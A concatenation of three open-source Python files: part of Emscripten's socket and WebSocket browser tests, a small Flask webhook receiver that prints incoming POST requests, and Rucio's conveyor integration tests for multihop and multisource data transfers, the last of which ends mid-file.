'udp': [CompiledServerHarness, 49162, ['-DTEST_DGRAM=1']],
# The following forces non-NULL addr and addlen parameters for the accept call
'accept_addr': [CompiledServerHarness, 49163, ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1']],
})
def test_sockets_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port] + args)
def test_sockets_echo_pthreads(self):
with CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 49161) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DSOCKK=%d' % harness.listen_port])
def test_sdl2_sockets_echo(self):
with CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164) as harness:
self.btest_exit('sdl2_net_client.c', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
@parameterized({
'websockify': [WebsockifyServerHarness, 49166, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49167, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 49168, ['-DTEST_DGRAM=1']],
# The following forces non-NULL addr and addlen parameters for the accept call
'accept_addr': [CompiledServerHarness, 49169, ['-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1']],
})
def test_sockets_async_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
args.append('-DTEST_ASYNC=1')
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=%d' % harness.listen_port] + args)
def test_sockets_async_bad_port(self):
# Deliberately attempt a connection on a port that will fail to test the error callback and
# getsockopt
self.btest_exit(test_file('sockets/test_sockets_echo_client.c'), args=['-DSOCKK=49169', '-DTEST_ASYNC=1'])
@parameterized({
'websockify': [WebsockifyServerHarness, 49171, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 49172, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 49173, ['-DTEST_DGRAM=1']],
})
def test_sockets_echo_bigdata(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
src = read_file(test_file('sockets/test_sockets_echo_client.c'))
create_file('test_sockets_echo_bigdata.c', src.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
self.btest_exit('test_sockets_echo_bigdata.c', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port] + args)
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(test_file('sockets/test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(test_file('sockets/test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_down_client.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
for harness in [
WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(test_file('sockets/test_sockets_echo_server.c'), ['-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest_exit(test_file('sockets/test_sockets_select_server_closes_connection_client_rw.c'), args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
with CompiledServerHarness(test_file('sockets/test_enet_server.c'), enet, 49210) as harness:
self.btest_exit(test_file('sockets/test_enet_client.c'), args=enet + ['-DSOCKK=%d' % harness.listen_port])
@parameterized({
'native': [WebsockifyServerHarness, 59160, ['-DTEST_DGRAM=0']],
'tcp': [CompiledServerHarness, 59162, ['-DTEST_DGRAM=0']],
'udp': [CompiledServerHarness, 59164, ['-DTEST_DGRAM=1']],
})
def test_nodejs_sockets_echo(self, harness_class, port, args):
if harness_class == WebsockifyServerHarness and common.EMTEST_LACKS_NATIVE_CLANG:
self.skipTest('requires native clang')
# Basic test of node client against both a Websockified and compiled echo server.
with harness_class(test_file('sockets/test_sockets_echo_server.c'), args, port) as harness:
expected = 'do_msg_read: read 14 bytes'
self.do_runf(test_file('sockets/test_sockets_echo_client.c'), expected, emcc_args=['-DSOCKK=%d' % harness.listen_port] + args)
@requires_native_clang
def test_nodejs_sockets_echo_subprotocol(self):
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
with WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59166):
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
create_file('websocket_pre.js', '''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
with WebsockifyServerHarness(test_file('sockets/test_sockets_echo_server.c'), [], 59168):
self.run_process([EMCC, '-Werror', test_file('sockets/test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js=websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'])
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest_exit(test_file('websocket/test_websocket_send.c'), args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets
# -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest_exit(test_file('websocket/tcp_echo_client.c'), args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
webhook.py
|
#
# Copyright 2021, NTT Communications Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import sys
from threading import Thread
from time import sleep
from typing import Callable, Optional, Tuple
from flask import Flask, request
from werkzeug.datastructures import EnvironHeaders
from .util import get_random_local_port
RANDOM_PORT_RETRY_MAX = 10
os.environ['WERKZEUG_RUN_MAIN'] = 'true' # eliminate werkzeug server banner on boot
logging.getLogger('werkzeug').disabled = True
class WebhookReceiver():
def __init__(self, address: str, port: int,
callback: Optional[Callable[[EnvironHeaders, str], None]] = None) -> None:
assert port >= 0
self.address: str = address
self.port: int = port
self.callback: Callable[[EnvironHeaders, str],
None] = callback if callback else self.resolve_request
self.thread: Optional[Thread] = None
def start(self) -> Tuple[str, int]:
if self.thread:
raise Exception('Already running')
self.thread = Thread(target=self.boot_server, daemon=True)
self.thread.start()
sleep(1)
assert self.thread
assert self.thread.is_alive()
return self.address, self.port
def boot_server(self) -> None:
app = Flask(self.__class__.__name__)
app.add_url_rule('/', 'post_callback', self._data_dispatcher, methods=['POST'])
if self.port > 0:
app.run(self.address, self.port)
return
retry = RANDOM_PORT_RETRY_MAX
while True:
try:
self.port = get_random_local_port()
app.run(self.address, self.port)
except OSError as err:
if err.errno == 98: # Address already in use
retry -= 1
if retry > 0:
continue
raise Exception('Cannot get unused port') from err
break
self.thread = None
def _data_dispatcher(self) -> str:
headers = request.headers
body = request.get_data(cache=False, as_text=True) # XXX: should decode as text?
Thread(target=self.callback, args=[headers, body], daemon=True).start()
return 'ok'
def resolve_request(self, headers: EnvironHeaders, body: str) -> None:
print(self)
print(headers)
print('--')
print(body)
def main(listen_address: str, listen_port: str):
try:
webhook = WebhookReceiver(listen_address, int(listen_port))
address, port = webhook.start()
pid = os.getpid()
print(f'{pid}\t{address}\t{port}')
assert webhook.thread
webhook.thread.join()
except KeyboardInterrupt:
print('caught SIGINT.')
if __name__ == '__main__':
main(sys.argv[1], sys.argv[2])
|
test_conveyor.py
|
# -*- coding: utf-8 -*-
# Copyright 2015-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Wen Guan <wen.guan@cern.ch>, 2015-2016
# - Vincent Garonne <vincent.garonne@cern.ch>, 2016
# - Martin Barisits <martin.barisits@cern.ch>, 2019-2022
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Mayank Sharma <imptodefeat@gmail.com>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
import threading
import time
from datetime import datetime, timedelta
from unittest.mock import patch
from urllib.parse import urlencode, urlparse, parse_qsl, urlunparse
import pytest
import rucio.daemons.reaper.reaper
from rucio.common.types import InternalAccount
from rucio.common.utils import generate_uuid
from rucio.common.exception import ReplicaNotFound, RequestNotFound
from rucio.core import config as core_config
from rucio.core import distance as distance_core
from rucio.core import replica as replica_core
from rucio.core import request as request_core
from rucio.core import rse as rse_core
from rucio.core import rule as rule_core
from rucio.daemons.conveyor.finisher import finisher
from rucio.daemons.conveyor.poller import poller
from rucio.daemons.conveyor.preparer import preparer
from rucio.daemons.conveyor.submitter import submitter
from rucio.daemons.conveyor.stager import stager
from rucio.daemons.conveyor.throttler import throttler
from rucio.daemons.conveyor.receiver import receiver, graceful_stop as receiver_graceful_stop
from rucio.daemons.reaper.reaper import reaper
from rucio.db.sqla import models
from rucio.db.sqla.constants import RequestState, RequestType, ReplicaState, RSEType
from rucio.db.sqla.session import read_session, transactional_session
from rucio.tests.common import skip_rse_tests_with_accounts
from rucio.transfertool.fts3 import FTS3Transfertool
MAX_POLL_WAIT_SECONDS = 60
TEST_FTS_HOST = 'https://fts:8446'
def __wait_for_replica_transfer(dst_rse_id, scope, name, state=ReplicaState.AVAILABLE, max_wait_seconds=MAX_POLL_WAIT_SECONDS):
"""
Wait for the replica to become AVAILABLE on the given RSE as a result of a pending transfer
"""
replica = None
for _ in range(max_wait_seconds):
poller(once=True, older_than=0, partition_wait_time=None)
finisher(once=True, partition_wait_time=None)
replica = replica_core.get_replica(rse_id=dst_rse_id, scope=scope, name=name)
if replica['state'] == state:
break
time.sleep(1)
return replica
def __wait_for_request_state(dst_rse_id, scope, name, state, max_wait_seconds=MAX_POLL_WAIT_SECONDS, run_poller=True):
"""
Wait for the request state to be updated to the given expected state as a result of a pending transfer
"""
request = None
for _ in range(max_wait_seconds):
if run_poller:
poller(once=True, older_than=0, partition_wait_time=None)
request = request_core.get_request_by_did(rse_id=dst_rse_id, scope=scope, name=name)
if request['state'] == state:
break
time.sleep(1)
return request
def __wait_for_fts_state(request, expected_state, max_wait_seconds=MAX_POLL_WAIT_SECONDS):
job_state = ''
for _ in range(max_wait_seconds):
fts_response = FTS3Transfertool(external_host=TEST_FTS_HOST).bulk_query(request['external_id'])
job_state = fts_response[request['external_id']][request['id']]['job_state']
if job_state == expected_state:
break
time.sleep(1)
return job_state
def set_query_parameters(url, params):
"""
Set a query parameter in an url which may, or may not, have other existing query parameters
"""
url_parts = list(urlparse(url))
query = dict(parse_qsl(url_parts[4]))
query.update(params)
url_parts[4] = urlencode(query)
return urlunparse(url_parts)
@read_session
def __get_source(request_id, src_rse_id, scope, name, session=None):
return session.query(models.Source) \
.filter(models.Source.request_id == request_id) \
.filter(models.Source.scope == scope) \
.filter(models.Source.name == name) \
.filter(models.Source.rse_id == src_rse_id) \
.first()
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher; changes XRD3 usage and limits")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
('transfers', 'multihop_tombstone_delay', -1), # Set OBSOLETE tombstone for intermediate replicas
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
'rucio.daemons.reaper.reaper.REGION',
]}], indirect=True)
@pytest.mark.parametrize("file_config_mock", [
# Run test twice: with, and without, temp tables
{
"overrides": [
('core', 'use_temp_tables', 'True'),
]
},
{
"overrides": [
('core', 'use_temp_tables', 'False'),
]
}
], indirect=True)
def test_multihop_intermediate_replica_lifecycle(vo, did_factory, root_account, core_config_mock, caches_mock, metrics_mock, file_config_mock):
"""
Ensure that intermediate replicas created by the submitter are protected from deletion even if their tombstone is
set to epoch.
After successful transfers, intermediate replicas with default (epoch) tombstone must be removed. The others must
be left intact.
"""
src_rse1_name = 'XRD1'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1_name, vo=vo)
src_rse2_name = 'XRD2'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2_name, vo=vo)
jump_rse_name = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse_name, vo=vo)
dst_rse_name = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse_name, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, jump_rse_id, dst_rse_id]
did = did_factory.upload_test_file(src_rse1_name)
# Copy replica to a second source. To avoid the special case of having a unique last replica, which could be handled in a special (more careful) way
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=src_rse2_name, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
replica = __wait_for_replica_transfer(dst_rse_id=src_rse2_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
rse_core.set_rse_limits(rse_id=jump_rse_id, name='MinFreeSpace', value=1)
rse_core.set_rse_usage(rse_id=jump_rse_id, source='storage', used=1, free=0)
try:
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse_name, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
# Submit transfers to FTS
# Ensure a replica was created on the intermediary host with epoch tombstone
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.SUBMITTED
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica['tombstone'] == datetime(year=1970, month=1, day=1)
assert replica['state'] == ReplicaState.COPYING
# The intermediate replica is protected by its state (Copying)
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses=jump_rse_name, exclude_rses=None)
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica['state'] == ReplicaState.COPYING
# Wait for the intermediate replica to become ready
replica = __wait_for_replica_transfer(dst_rse_id=jump_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
# The intermediate replica is protected by an entry in the sources table
# Reaper must not remove this replica, even if it has an obsolete tombstone
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses=jump_rse_name, exclude_rses=None)
replica = replica_core.get_replica(rse_id=jump_rse_id, **did)
assert replica
# FTS fails the second transfer
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
# Call finisher once to update the source rankings
finisher(once=True, partition_wait_time=None)
# ensure tha the ranking was correctly decreased
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
# run submitter again to copy from jump rse to destination rse
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], partition_wait_time=None, transfertype='single', filter_transfertool=None)
# Wait for the destination replica to become ready
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did, max_wait_seconds=120)
assert replica['state'] == ReplicaState.AVAILABLE
rucio.daemons.reaper.reaper.REGION.invalidate()
reaper(once=True, rses=[], include_rses='test_container_xrd=True', exclude_rses=None)
with pytest.raises(ReplicaNotFound):
replica_core.get_replica(rse_id=jump_rse_id, **did)
# 4 request: copy to second source + 1 multihop with two hops (but second hop fails) + re-scheduled second hop
# Use inequalities, because there can be left-overs from other tests
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 4
assert metrics_mock.get_sample_value('rucio_core_request_submit_transfer_total') >= 4
# at least the failed hop
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_finisher_handle_requests_total') > 0
finally:
@transactional_session
def _cleanup_all_usage_and_limits(rse_id, session=None):
session.query(models.RSELimit).filter_by(rse_id=rse_id).delete()
session.query(models.RSEUsage).filter_by(rse_id=rse_id, source='storage').delete()
_cleanup_all_usage_and_limits(rse_id=jump_rse_id)
@skip_rse_tests_with_accounts
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_fts_non_recoverable_failures_handled_on_multihop(vo, did_factory, root_account, replica_client, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the poller correctly handles non-recoverable FTS job failures
"""
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Register a did which doesn't exist. It will trigger an non-recoverable error during the FTS transfer.
did = did_factory.random_did()
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
assert 'Unused hop in multi-hop' in request['err_msg']
assert request['state'] == RequestState.FAILED
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.FAILED
assert request['attributes']['source_replica_expression'] == src_rse
# Each hop is a separate transfer, which will be handled by the poller and marked as failed
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 2
finisher(once=True, partition_wait_time=None)
# The intermediate request must not be re-scheduled by finisher
with pytest.raises(RequestNotFound):
request_core.get_request_by_did(rse_id=jump_rse_id, **did)
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# ensure tha the ranking was correctly decreased for the whole path
assert __get_source(request_id=request['id'], src_rse_id=jump_rse_id, **did).ranking == -1
assert __get_source(request_id=request['id'], src_rse_id=src_rse_id, **did).ranking == -1
assert request['state'] == RequestState.QUEUED
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_fts_recoverable_failures_handled_on_multihop(vo, did_factory, root_account, replica_client, file_factory, core_config_mock, caches_mock, metrics_mock):
"""
Verify that the poller correctly handles recoverable FTS job failures
"""
src_rse = 'XRD1'
src_rse_id = rse_core.get_rse_id(rse=src_rse, vo=vo)
jump_rse = 'XRD3'
jump_rse_id = rse_core.get_rse_id(rse=jump_rse, vo=vo)
dst_rse = 'XRD4'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse_id, jump_rse_id, dst_rse_id]
# Create and upload a real file, but register it with wrong checksum. This will trigger
# a FTS "Recoverable" failure on checksum validation
local_file = file_factory.file_generator()
did = did_factory.random_did()
did_factory.upload_client.upload(
[
{
'path': local_file,
'rse': src_rse,
'did_scope': did['scope'].external,
'did_name': did['name'],
'no_register': True,
}
]
)
replica_client.add_replicas(rse=src_rse, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.FAILED, **did)
assert request['state'] == RequestState.FAILED
request = request_core.get_request_by_did(rse_id=jump_rse_id, **did)
assert request['state'] == RequestState.FAILED
# Each hop is a separate transfer, which will be handled by the poller and marked as failed
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 2
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter, poller and finisher")
@pytest.mark.parametrize("core_config_mock", [{"table_content": [
('transfers', 'use_multihop', True),
]}], indirect=True)
@pytest.mark.parametrize("caches_mock", [{"caches_to_mock": [
'rucio.core.rse_expression_parser.REGION', # The list of multihop RSEs is retrieved by rse expression
'rucio.core.config.REGION',
]}], indirect=True)
def test_multisource(vo, did_factory, root_account, replica_client, core_config_mock, caches_mock, metrics_mock):
src_rse1 = 'XRD4'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1, vo=vo)
src_rse2 = 'XRD1'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2, vo=vo)
dst_rse = 'XRD3'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, dst_rse_id]
# Add a good replica on the RSE which has a higher distance ranking
did = did_factory.upload_test_file(src_rse1)
# Add non-existing replica which will fail during multisource transfers on the RSE with lower cost (will be the preferred source)
replica_client.add_replicas(rse=src_rse2, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
@read_session
def __source_exists(src_rse_id, scope, name, session=None):
return session.query(models.Source) \
.filter(models.Source.rse_id == src_rse_id) \
.filter(models.Source.scope == scope) \
.filter(models.Source.name == name) \
.count() != 0
# Entries in the source table must be created for both sources of the multi-source transfer
assert __source_exists(src_rse_id=src_rse1_id, **did)
assert __source_exists(src_rse_id=src_rse2_id, **did)
# After submission, the source rse is the one which will fail
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert request['source_rse'] == src_rse2
assert request['source_rse_id'] == src_rse2_id
# The source_rse must be updated to the correct one
request = __wait_for_request_state(dst_rse_id=dst_rse_id, state=RequestState.DONE, **did)
assert request['source_rse'] == src_rse1
assert request['source_rse_id'] == src_rse1_id
replica = __wait_for_replica_transfer(dst_rse_id=dst_rse_id, **did)
assert replica['state'] == ReplicaState.AVAILABLE
# Both entries in source table must be removed after completion
assert not __source_exists(src_rse_id=src_rse1_id, **did)
assert not __source_exists(src_rse_id=src_rse2_id, **did)
# Only one request was handled; doesn't matter that it's multisource
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_finisher_handle_requests_total') >= 1
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_poller_update_request_state_total', labels={'updated': 'True'}) >= 1
assert metrics_mock.get_sample_value(
'rucio_core_request_get_next_total',
labels={
'request_type': 'TRANSFER.STAGEIN.STAGEOUT',
'state': 'DONE.FAILED.LOST.SUBMITTING.SUBMISSION_FAILED.NO_SOURCES.ONLY_TAPE_SOURCES.MISMATCH_SCHEME'}
)
@skip_rse_tests_with_accounts
@pytest.mark.dirty(reason="leaves files in XRD containers")
@pytest.mark.noparallel(reason="uses predefined RSEs; runs submitter and receiver")
def test_multisource_receiver(vo, did_factory, replica_client, root_account, metrics_mock):
"""
Run receiver as a background thread to automatically handle fts notifications.
Ensure that a multi-source job in which the first source fails is correctly handled by receiver.
"""
receiver_thread = threading.Thread(target=receiver, kwargs={'id_': 0, 'full_mode': True, 'all_vos': True, 'total_threads': 1})
receiver_thread.start()
try:
src_rse1 = 'XRD4'
src_rse1_id = rse_core.get_rse_id(rse=src_rse1, vo=vo)
src_rse2 = 'XRD1'
src_rse2_id = rse_core.get_rse_id(rse=src_rse2, vo=vo)
dst_rse = 'XRD3'
dst_rse_id = rse_core.get_rse_id(rse=dst_rse, vo=vo)
all_rses = [src_rse1_id, src_rse2_id, dst_rse_id]
# Add a good replica on the RSE which has a higher distance ranking
did = did_factory.upload_test_file(src_rse1)
# Add non-existing replica which will fail during multisource transfers on the RSE with lower cost (will be the preferred source)
replica_client.add_replicas(rse=src_rse2, files=[{'scope': did['scope'].external, 'name': did['name'], 'bytes': 1, 'adler32': 'aaaaaaaa'}])
rule_core.add_rule(dids=[did], account=root_account, copies=1, rse_expression=dst_rse, grouping='ALL', weight=None, lifetime=None, locked=False, subscription_id=None)
submitter(once=True, rses=[{'id': rse_id} for rse_id in all_rses], group_bulk=2, partition_wait_time=None, transfertype='single', filter_transfertool=None)
# After submission, the source rse is the one which will fail
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
assert request['source_rse'] == src_rse2
assert request['source_rse_id'] == src_rse2_id
request = None
for _ in range(MAX_POLL_WAIT_SECONDS):
request = request_core.get_request_by_did(rse_id=dst_rse_id, **did)
# The request must not be marked as failed. Not even temporarily. It is a multi-source transfer and the
# the first, failed, source must not change the replica state. We must wait for all sources to be tried.
assert request['state'] != RequestState.FAILED
if request['state'] == RequestState.DONE:
break
time.sleep(1)
assert request['state'] == RequestState.DONE
assert metrics_mock.get_sample_value('rucio_daemons_conveyor_receiver_update_request_state_total', labels={'updated': 'True'}) >= 1
# The source was updated to the good one
assert request['source_rse'] == src_rse1
assert request['source_rse_id'] == src_rse1_id
finally:
receiver_graceful_stop.set()
receiver_thread.join(timeout=5)
receiver_graceful_stop.clear()
@skip_rse_tests_with_accounts
